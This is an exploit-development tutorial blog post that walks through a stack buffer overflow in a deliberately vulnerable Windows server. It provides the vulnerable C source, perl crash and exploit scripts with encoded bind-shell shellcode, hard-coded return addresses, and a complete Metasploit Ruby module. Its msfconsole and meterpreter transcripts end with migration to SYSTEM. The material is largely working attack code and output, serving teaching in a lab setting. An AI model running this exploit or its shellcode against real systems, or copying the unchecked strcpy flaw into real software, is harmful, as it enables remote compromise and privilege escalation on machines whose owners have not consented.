Exploit writing tutorial part 4 : From Exploit to Metasploit – The basics
2011-11-01 12:19
In the first parts of the exploit writing tutorial, I have discussed some common vulnerabilities that can lead to 2 types of exploits: stack based buffer overflows (with direct EIP overwrite), and stack based buffer overflows that take advantage of SEH chains. In my examples, I have used perl to demonstrate how to build a working exploit.
Obviously, writing exploits is not limited to perl only. I guess every programming language could be used to write exploits… so you can just pick the one that you are most familiar with (python, c, c++, C#, etc).

Despite the fact that these custom written exploits will work just fine, it may be nice to be able to include your own exploits in the metasploit framework in order to take advantage of some of the unique metasploit features.

So today, I'm going to explain how exploits can be written as a metasploit module.

Metasploit modules are written in ruby. Even if you don't know a lot about ruby, you should still be able to write a metasploit exploit module based on this tutorial and the existing exploits available in metasploit.
Metasploit exploit module structure

A typical metasploit exploit module consists of the following components:

- header and some dependencies
  - some comments about the exploit module
  - require 'msf/core'
- class definition
- includes
- "def" definitions:
  - initialize
  - check (optional)
  - exploit

You can put comments in your metasploit module by using the # character. That's all we need to know for now, let's look at the steps to build a metasploit exploit module.
Case study: building an exploit for a simple vulnerable server

We'll use the following vulnerable server code (C) to demonstrate the building process:

```c
#include <iostream.h>
#include <winsock.h>
#include <windows.h>

// load windows socket
#pragma comment(lib, "wsock32.lib")

// Define Return Messages
#define SS_ERROR 1
#define SS_OK 0

void pr(char *str)
{
    char buf[500] = "";
    strcpy(buf, str);
}

void sError(char *str)
{
    MessageBox(NULL, str, "socket Error", MB_OK);
    WSACleanup();
}

int main(int argc, char **argv)
{
    WORD sockVersion;
    WSADATA wsaData;
    int rVal;
    char Message[5000] = "";
    char buf[2000] = "";
    u_short LocalPort;
    LocalPort = 200;

    // wsock32 initialized for usage
    sockVersion = MAKEWORD(1, 1);
    WSAStartup(sockVersion, &wsaData);

    // create server socket
    SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);
    if (serverSocket == INVALID_SOCKET)
    {
        sError("Failed socket()");
        return SS_ERROR;
    }

    SOCKADDR_IN sin;
    sin.sin_family = PF_INET;
    sin.sin_port = htons(LocalPort);
    sin.sin_addr.s_addr = INADDR_ANY;

    // bind the socket
    rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
    if (rVal == SOCKET_ERROR)
    {
        sError("Failed bind()");
        WSACleanup();
        return SS_ERROR;
    }

    // get socket to listen
    rVal = listen(serverSocket, 10);
    if (rVal == SOCKET_ERROR)
    {
        sError("Failed listen()");
        WSACleanup();
        return SS_ERROR;
    }

    // wait for a client to connect
    SOCKET clientSocket;
    clientSocket = accept(serverSocket, NULL, NULL);
    if (clientSocket == INVALID_SOCKET)
    {
        sError("Failed accept()");
        WSACleanup();
        return SS_ERROR;
    }

    int bytesRecv = SOCKET_ERROR;
    while (bytesRecv == SOCKET_ERROR)
    {
        // receive the data that is being sent by the client, max limit to 5000 bytes.
        bytesRecv = recv(clientSocket, Message, 5000, 0);
        if (bytesRecv == 0 || bytesRecv == WSAECONNRESET)
        {
            printf("\nConnection Closed.\n");
            break;
        }
    }

    // Pass the data received to the function pr
    pr(Message);

    // close client socket
    closesocket(clientSocket);
    // close server socket
    closesocket(serverSocket);

    WSACleanup();
    return SS_OK;
}
```
Compile the code and run it on a Windows 2003 server R2 with SP2. (I have used lcc-win32 to compile the code)

When you send 1000 bytes to the server, the server will crash.

The following perl script demonstrates the crash:
```perl
use strict;
use Socket;
my $junk = "\x41" x 1000;

# initialize host and port
my $host = shift || 'localhost';
my $port = shift || 200;
my $proto = getprotobyname('tcp');

# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);

print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payload\n";
print SOCKET $junk . "\n";
print "[+] Payload sent\n";
close SOCKET or die "close: $!";
```
The vulnerable server dies, and EIP gets overwritten with A's:

```
0:001> g
(e00.de0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012e05c ebx=7ffd6000 ecx=00000000 edx=0012e446 esi=0040bdec edi=0012ebe0
eip=41414141 esp=0012e258 ebp=41414141 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
41414141 ??              ???
```
Using a metasploit pattern, we determine that the offset to EIP overwrite is at 504 bytes. So we'll build a new crash script to verify the offset and see the contents of the registers when the overflow occurs:
```perl
use strict;
use Socket;
my $totalbuffer = 1000;
my $junk = "\x41" x 504;
my $eipoverwrite = "\x42" x 4;
my $junk2 = "\x43" x ($totalbuffer - length($junk . $eipoverwrite));

# initialize host and port
my $host = shift || 'localhost';
my $port = shift || 200;
my $proto = getprotobyname('tcp');

# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);

print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payload\n";
print SOCKET $junk . $eipoverwrite . $junk2 . "\n";
print "[+] Payload sent\n";
close SOCKET or die "close: $!";
```
After sending 504 A's, 4 B's and a bunch of C's, we can see the following register and stack contents:

```
0:001> g
(ed0.eb0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0012e05c ebx=7ffde000 ecx=00000000 edx=0012e446 esi=0040bdec edi=0012ebe0
eip=42424242 esp=0012e258 ebp=41414141 iopl=0         nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010212
42424242 ??              ???
0:000> d esp
0012e258  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e268  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e278  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e288  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e298  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e2a8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e2b8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
0012e2c8  43 43 43 43 43 43 43 43-43 43 43 43 43 43 43 43  CCCCCCCCCCCCCCCC
```
Increase the junk size to see how much space you have available for your shellcode. This is important because you will need to specify this parameter in the metasploit module.

Change the $totalbuffer value to 2000: the overflow still works as expected, and the contents of esp indicate that we have been able to fill memory with C's up to esp+5d3 (1491 bytes). That will be our shellcode space (more or less).

All we need is to overwrite EIP with jmp esp (or call esp, or something similar), and put our shellcode instead of the C's, and we should be fine.

Using findjmp, we have found a working address for our Windows 2003 R2 SP2 server:
```
findjmp.exe ws2_32.dll esp
Reg: esp
Scanning ws2_32.dll for code usable with the esp register
0x71C02B67      push esp - ret
Finished Scanning ws2_32.dll for code usable with the esp register
Found 1 usable addresses
```
After doing some tests with shellcode, we can use the following conclusions to build the final exploit:

- exclude 0xff from the shellcode
- put some nop's before the shellcode

Our final exploit (in perl, with a shell bound to tcp 5555) looks like this:
```perl
#
print "--------------------------------------\n";
print "Writing Buffer Overflows\n";
print "Peter Van Eeckhoutte\n";
print "http://www.corelan.be:8800\n";
print "--------------------------------------\n";
print "Exploit for vulnserver.c\n";
print "--------------------------------------\n";
use strict;
use Socket;
my $junk = "\x90" x 504;

# jmp esp (from ws2_32.dll)
my $eipoverwrite = pack('V', 0x71C02B67);

# add some NOP's
my $shellcode = "\x90" x 50;

# windows/shell_bind_tcp - 702 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_upper
# EXITFUNC=seh, LPORT=5555, RHOST=
$shellcode = $shellcode . "\x89\xe0\xd9\xd0\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x43".
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58".
"\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42".
"\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30".
"\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x42\x4a".
"\x4a\x4b\x50\x4d\x4d\x38\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f".
"\x45\x30\x4c\x4b\x42\x4c\x51\x34\x51\x34\x4c\x4b\x47\x35".
"\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x45\x51\x4a\x4f".
"\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x47\x50\x43\x31".
"\x4a\x4b\x47\x39\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e".
"\x50\x31\x49\x50\x4a\x39\x4e\x4c\x4c\x44\x49\x50\x42\x54".
"\x45\x57\x49\x51\x48\x4a\x44\x4d\x45\x51\x48\x42\x4a\x4b".
"\x4c\x34\x47\x4b\x46\x34\x46\x44\x51\x38\x42\x55\x4a\x45".
"\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a\x4b\x43\x56\x4c\x4b".
"\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b".
"\x44\x43\x46\x4c\x4c\x4b\x4b\x39\x42\x4c\x51\x34\x45\x4c".
"\x45\x31\x49\x53\x46\x51\x49\x4b\x43\x54\x4c\x4b\x51\x53".
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c".
"\x4e\x4d\x4c\x4b\x51\x50\x44\x48\x51\x4e\x43\x58\x4c\x4e".
"\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f\x4e\x36\x45\x36".
"\x51\x43\x42\x46\x43\x58\x46\x53\x47\x42\x45\x38\x43\x47".
"\x44\x33\x46\x52\x51\x4f\x46\x34\x4b\x4f\x48\x50\x42\x48".
"\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48\x56".
"\x51\x4f\x4c\x49\x4d\x35\x43\x56\x4b\x31\x4a\x4d\x45\x58".
"\x44\x42\x46\x35\x43\x5a\x43\x32\x4b\x4f\x4e\x30\x45\x38".
"\x48\x59\x45\x59\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56".
"\x51\x43\x50\x53\x50\x53\x46\x33\x46\x33\x51\x53\x50\x53".
"\x47\x33\x46\x33\x4b\x4f\x4e\x30\x42\x46\x42\x48\x42\x35".
"\x4e\x53\x45\x36\x50\x53\x4b\x39\x4b\x51\x4c\x55\x43\x58".
"\x4e\x44\x45\x4a\x44\x30\x49\x57\x46\x37\x4b\x4f\x4e\x36".
"\x42\x4a\x44\x50\x50\x51\x50\x55\x4b\x4f\x48\x50\x45\x38".
"\x49\x34\x4e\x4d\x46\x4e\x4a\x49\x50\x57\x4b\x4f\x49\x46".
"\x46\x33\x50\x55\x4b\x4f\x4e\x30\x42\x48\x4d\x35\x51\x59".
"\x4c\x46\x51\x59\x51\x47\x4b\x4f\x49\x46\x46\x30\x50\x54".
"\x46\x34\x50\x55\x4b\x4f\x48\x50\x4a\x33\x43\x58\x4b\x57".
"\x43\x49\x48\x46\x44\x39\x51\x47\x4b\x4f\x4e\x36\x46\x35".
"\x4b\x4f\x48\x50\x43\x56\x43\x5a\x45\x34\x42\x46\x45\x38".
"\x43\x53\x42\x4d\x4b\x39\x4a\x45\x42\x4a\x50\x50\x50\x59".
"\x47\x59\x48\x4c\x4b\x39\x4d\x37\x42\x4a\x47\x34\x4c\x49".
"\x4b\x52\x46\x51\x49\x50\x4b\x43\x4e\x4a\x4b\x4e\x47\x32".
"\x46\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a".
"\x46\x58\x4e\x4b\x4e\x4b\x4e\x4b\x43\x58\x43\x42\x4b\x4e".
"\x48\x33\x42\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56".
"\x51\x4b\x46\x37\x50\x52\x50\x51\x50\x51\x50\x51\x43\x5a".
"\x45\x51\x46\x31\x50\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30".
"\x43\x58\x4e\x4d\x49\x49\x44\x45\x48\x4e\x46\x33\x4b\x4f".
"\x48\x56\x43\x5a\x4b\x4f\x4b\x4f\x50\x37\x4b\x4f\x4e\x30".
"\x4c\x4b\x51\x47\x4b\x4c\x4b\x33\x49\x54\x42\x44\x4b\x4f".
"\x48\x56\x51\x42\x4b\x4f\x48\x50\x43\x58\x4a\x50\x4c\x4a".
"\x43\x34\x51\x4f\x50\x53\x4b\x4f\x4e\x36\x4b\x4f\x48\x50".
"\x41\x41";

# initialize host and port
my $host = shift || 'localhost';
my $port = shift || 200;
my $proto = getprotobyname('tcp');

# get the port address
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);

print "[+] Setting up socket\n";
# create the socket, connect to the port
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payload\n";
print SOCKET $junk . $eipoverwrite . $shellcode . "\n";
print "[+] Payload sent\n";
print "[+] Attempting to telnet to $host on port 5555...\n";
system("telnet $host 5555");
close SOCKET or die "close: $!";
```
Exploit output:

```
root@backtrack4:/tmp# perl sploit.pl 192.168.24.3 200
--------------------------------------
Writing Buffer Overflows
Peter Van Eeckhoutte
http://www.corelan.be:8800
--------------------------------------
Exploit for vulnserver.c
--------------------------------------
[+] Setting up socket
[+] Connecting to 192.168.24.3 on port 200
[+] Sending payload
[+] Payload sent
[+] Attempting to telnet to 192.168.24.3 on port 5555...
Trying 192.168.24.3...
Connected to 192.168.24.3.
Escape character is '^]'.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\vulnserver\lcc>whoami
whoami
win2003-01\administrator
```
The most important parameters that can be taken from this exploit are:

- offset to ret (eip overwrite) is 504
- windows 2003 R2 SP2 (English) jump address is 0x71C02B67
- shellcode should not contain 0x00 or 0xff
- shellcode can be more or less 1400 bytes

Furthermore, after running the same tests against a Windows XP SP3 (English), we determine that the offset is the same, but the jmp address must be changed (to for example 0x7C874413). We'll build a metasploit module that will allow you to select one of these 2 targets, and will use the correct jmp address.
Converting the exploit to metasploit

First, you need to determine what type your exploit will be, because that will determine the place within the metasploit folder structure where the exploit will be saved. If your exploit is targeting a windows based ftp server, it would need to be placed under the windows ftp server exploits.

Metasploit modules are saved in the framework3xx folder structure, under /modules/exploits. In that folder, the exploits are broken down into operating systems first, and then services.

Our server runs on windows, so we'll put it under windows. The windows folder contains a number of folders already (from antivirus to wins), including a "misc" folder. We'll put our exploit under "misc" (or we could put it under telnet) because it does not really belong to any of the other types.

We'll create our metasploit module under %metasploit%/modules/windows/misc:

```
root@backtrack4:/# cd /pentest/exploits/framework3/modules/exploits/windows/misc
root@backtrack4:/pentest/exploits/framework3/modules/exploits/windows/misc# vi custom_vulnserver.rb
```
```ruby
#
#
# Custom metasploit exploit for vulnserver.c
# Written by Peter Van Eeckhoutte
#
#
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

    include Msf::Exploit::Remote::Tcp

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'Custom vulnerable server stack overflow',
            'Description'    => %q{
                    This module exploits a stack overflow in a
                    custom vulnerable server.
            },
            'Author'         => [ 'Peter Van Eeckhoutte' ],
            'Version'        => '$Revision: 9999 $',
            'DefaultOptions' =>
                {
                    'EXITFUNC' => 'process',
                },
            'Payload'        =>
                {
                    'Space'    => 1400,
                    'BadChars' => "\x00\xff",
                },
            'Platform'       => 'win',
            'Targets'        =>
                [
                    ['Windows XP SP3 En',
                        { 'Ret' => 0x7c874413, 'Offset' => 504 } ],
                    ['Windows 2003 Server R2 SP2',
                        { 'Ret' => 0x71c02b67, 'Offset' => 504 } ],
                ],
            'DefaultTarget'  => 0,
            'Privileged'     => false
        ))

        register_options(
            [
                Opt::RPORT(200)
            ], self.class)
    end

    def exploit
        connect

        # junk: a NOP sled exactly as long as the offset to the saved return address
        junk = make_nops(target['Offset'])
        # return address (little-endian), a few more NOPs, then the encoded payload
        sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded

        sock.put(sploit)

        handler
        disconnect
    end
end
```
We see the following components:

- first, put "require msf/core", which will be valid for all metasploit exploits
- define the class. In our case, it is a remote exploit.
- Next, set exploit information and exploit definitions:
  - include: in our case, it is a plain tcp connection, so we use Msf::Exploit::Remote::Tcp. Metasploit has handlers for http, ftp, etc… (which will help you building exploits faster because you don't have to write the entire conversation yourself)
  - Information:
    - Payload: define the length and badchars (0x00 and 0xff in our case)
    - Define the targets, and define target-specific settings such as return address, offset, etc
- Exploit:
  - connect (which will set up the connection to the remote port)
  - build the buffer:
    - junk (nops, with size of offset)
    - add the return address, more nops, and then the encoded payload
  - write the buffer to the connection
  - handle the exploit
  - disconnect

That's it.
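To make the buffer layout of the exploit method concrete, here is an added stand-alone Ruby snippet; it is not part of the tutorial or of Metasploit, and it substitutes plain Ruby for the framework's make_nops, target.ret and payload.encoded so it runs without msf/core. It reproduces the same junk + ret + nops + payload layout, enforces the Space and BadChars limits the module declares, and then dissects the finished buffer to confirm which dword lands in EIP; the payload bytes are constructed dummy values.

```ruby
# Same target table as the module: [name, { 'Ret' => jmp/push esp address, 'Offset' => bytes to EIP }]
TARGETS = [
  ['Windows XP SP3 En',          { 'Ret' => 0x7c874413, 'Offset' => 504 }],
  ['Windows 2003 Server R2 SP2', { 'Ret' => 0x71c02b67, 'Offset' => 504 }],
]
PAYLOAD_SPACE = 1400            # 'Space' from the module's Payload hash
BAD_CHARS     = "\x00\xff".b    # 'BadChars' from the module's Payload hash

# Stand-in for Msf's make_nops: a plain 0x90 sled of the requested length.
# (Metasploit's own make_nops may emit a randomised NOP-equivalent sled.)
def make_nops(len)
  "\x90".b * len
end

# Returns the bad bytes found in +payload+ (empty array when clean). This is the
# constraint the framework's encoder chain enforces from 'BadChars'.
def bad_chars_in(payload)
  forbidden = BAD_CHARS.bytes
  payload.b.bytes.uniq.select { |byte| forbidden.include?(byte) }
end

# Mirrors the module's exploit method:
#   junk   = make_nops(target['Offset'])
#   sploit = junk + [target.ret].pack('V') + make_nops(50) + payload.encoded
# and refuses to build when the payload breaks the declared Space/BadChars limits.
def build_sploit(target, payload)
  _name, opts = target
  if payload.bytesize > PAYLOAD_SPACE
    raise ArgumentError, "payload is #{payload.bytesize} bytes, Space is #{PAYLOAD_SPACE}"
  end
  bad = bad_chars_in(payload)
  unless bad.empty?
    raise ArgumentError, 'payload contains bad chars: ' + bad.map { |b| format('0x%02x', b) }.join(' ')
  end
  make_nops(opts['Offset']) + [opts['Ret']].pack('V') + make_nops(50) + payload.b
end

# Reads the buffer back the way the overflowed stack frame will: returns the
# little-endian dword that overwrites EIP and the bytes esp points at afterwards.
def dissect(buffer, offset)
  eip   = buffer.byteslice(offset, 4).unpack1('V')
  after = buffer.byteslice(offset + 4, buffer.bytesize - offset - 4)
  [eip, after]
end

if __FILE__ == $0
  buf = build_sploit(TARGETS[1], "\xcc".b * 10)   # constructed dummy payload (int3 x 10)
  eip, _rest = dissect(buf, TARGETS[1][1]['Offset'])
  printf("buffer %d bytes, EIP <- 0x%08x\n", buf.bytesize, eip)
end
```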
Now open msfconsole. If there is an error in your script, you will see information about the error while msfconsole loads. If msfconsole was already loaded, you'll have to close it again before you can use this new module (or before you can use the updated module if you have made a change).

Test the exploit

Test 1: Windows XP SP3
```
root@backtrack4:/pentest/exploits/framework3# ./msfconsole

       =[ msf v3.3-dev
+ -- --=[ 395 exploits - 239 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 187 aux

msf > use windows/misc/custom_vulnserver
msf exploit(custom_vulnserver) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  200              yes       The target port

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 En

msf exploit(custom_vulnserver) > set rhost 192.168.24.10
rhost => 192.168.24.10
msf exploit(custom_vulnserver) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows XP SP3 En
   1   Windows 2003 Server R2 SP2

msf exploit(custom_vulnserver) > set target 0
target => 0
msf exploit(custom_vulnserver) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(custom_vulnserver) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.24.10    yes       The target address
   RPORT  200              yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.24.10    no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 En

msf exploit(custom_vulnserver) > exploit

[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 1 opened (192.168.24.1:42150 -> 192.168.24.10:4444)

meterpreter > sysinfo
Computer: SPLOITBUILDER1
OS      : Windows XP (Build 2600, Service Pack 3).
```
Test 2: Windows 2003 Server R2 SP2

(continued from the exploit against XP):

```
meterpreter > quit

[*] Meterpreter session 1 closed.
msf exploit(custom_vulnserver) > set rhost 192.168.24.3
rhost => 192.168.24.3
msf exploit(custom_vulnserver) > set target 1
target => 1
msf exploit(custom_vulnserver) > show options

Module options:

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.24.3     yes       The target address
   RPORT  200              yes       The target port

Payload options (windows/meterpreter/bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LPORT     4444             yes       The local port
   RHOST     192.168.24.3     no        The target address

Exploit target:

   Id  Name
   --  ----
   1   Windows 2003 Server R2 SP2

msf exploit(custom_vulnserver) > exploit

[*] Started bind handler
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (718336 bytes)
[*] Meterpreter session 2 opened (192.168.24.1:56109 -> 192.168.24.3:4444)

meterpreter > sysinfo
Computer: WIN2003-01
OS      : Windows .NET Server (Build 3790, Service Pack 2).
meterpreter > getuid
Server username: WIN2003-01\Administrator
meterpreter > ps

Process list
============

    PID   Name            Path
    ---   ----            ----
    300   smss.exe        \SystemRoot\System32\smss.exe
    372   winlogon.exe    \??\C:\WINDOWS\system32\winlogon.exe
    396   Explorer.EXE    C:\WINDOWS\Explorer.EXE
    420   services.exe    C:\WINDOWS\system32\services.exe
    424   ctfmon.exe      C:\WINDOWS\system32\ctfmon.exe
    432   lsass.exe       C:\WINDOWS\system32\lsass.exe
    652   svchost.exe     C:\WINDOWS\system32\svchost.exe
    832   svchost.exe     C:\WINDOWS\System32\svchost.exe
    996   spoolsv.exe     C:\WINDOWS\system32\spoolsv.exe
    1132  svchost.exe     C:\WINDOWS\System32\svchost.exe
    1392  dllhost.exe     C:\WINDOWS\system32\dllhost.exe
    1580  svchost.exe     C:\WINDOWS\System32\svchost.exe
    1600  svchost.exe     C:\WINDOWS\System32\svchost.exe
    2352  cmd.exe         C:\WINDOWS\system32\cmd.exe
    2888  vulnserver.exe  C:\vulnserver\lcc\vulnserver.exe

meterpreter > migrate 996
[*] Migrating to 996...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

pwned!
More info about the Metasploit API

You can find more information about the Metasploit API (and available classes) at http://www.metasploit.com/documents/api/msfcore/index.html

Now go out and build your own exploits, put some l33t talk in the exploit and don't forget to send your greetings to corelanc0d3r :-)

© 2009–2010, Corelan Team (corelanc0d3r). All rights reserved.